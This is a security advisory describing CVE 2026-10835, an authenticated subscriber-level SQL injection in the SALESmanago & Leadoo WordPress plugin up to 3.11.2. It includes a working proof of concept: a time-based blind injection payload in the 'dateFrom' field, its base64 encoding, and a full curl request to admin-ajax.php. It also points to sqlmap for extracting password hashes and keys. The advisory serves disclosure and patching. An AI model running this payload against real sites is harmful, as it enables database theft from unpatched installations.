SALESmanago & Leadoo < 3.11.3 – Subscriber+ SQL Injection | CVE 2026-10835

Description

The plugin does not properly sanitise and escape a parameter passed to one of its AJAX actions before using it in a SQL statement, and fails to enforce authorisation on that action, allowing authenticated users with minimal permissions, such as subscribers, to perform SQL injection attacks.

Proof of Concept

Affected: SALESmanago & Leadoo <= 3.11.2 (fixed in 3.11.3). Requires only an authenticated account of any role (Subscriber or higher). No valid nonce is needed: in the affected versions the AJAX authorisation helper returns early for non-administrators without stopping execution, so the request reaches the vulnerable query.

Prerequisites:
- A WordPress site with SALESmanago & Leadoo <= 3.11.2 active.
- Any authenticated account, e.g. a Subscriber. Capture its wordpress_logged_in_* cookie (DevTools > Application > Cookies, or by logging in with curl).

Time-based blind SQL injection:

The AJAX action salesmanago_export_count_contacts reads a base64-encoded JSON "data" parameter whose "dateFrom" field is concatenated unsanitised into a SQL query. Payload (decoded) is:

  {"dateFrom":"2000-01-01' OR SLEEP(2) OR 'x'='x","exportType":"contacts"}

Base64-encoded:

  eyJkYXRlRnJvbSI6IjIwMDAtMDEtMDEnIE9SIFNMRUVQKDIpIE9SICd4Jz0neCIsImV4cG9ydFR5cGUiOiJjb250YWN0cyJ9

Send it as the authenticated subscriber:

  curl -s 'https://victim.example/wp-admin/admin-ajax.php' \
    -b 'wordpress_logged_in_XXXX=YYYY' \
    -H 'X-Requested-With: XMLHttpRequest' \
    --data-urlencode 'action=salesmanago_export_count_contacts' \
    --data-urlencode 'data=eyJkYXRlRnJvbSI6IjIwMDAtMDEtMDEnIE9SIFNMRUVQKDIpIE9SICd4Jz0neCIsImV4cG9ydFR5cGUiOiJjb250YWN0cyJ9'

Expected: the response is delayed (~2 seconds per scanned row) because SLEEP(2) is executed, whereas the same request with SLEEP(0) returns near-instantly. The timing differential confirms time-based blind SQL injection. The injection point can be driven with UNION/boolean techniques (or sqlmap on the "data" parameter, dateFrom field) to exfiltrate user password hashes, secret keys and other database contents.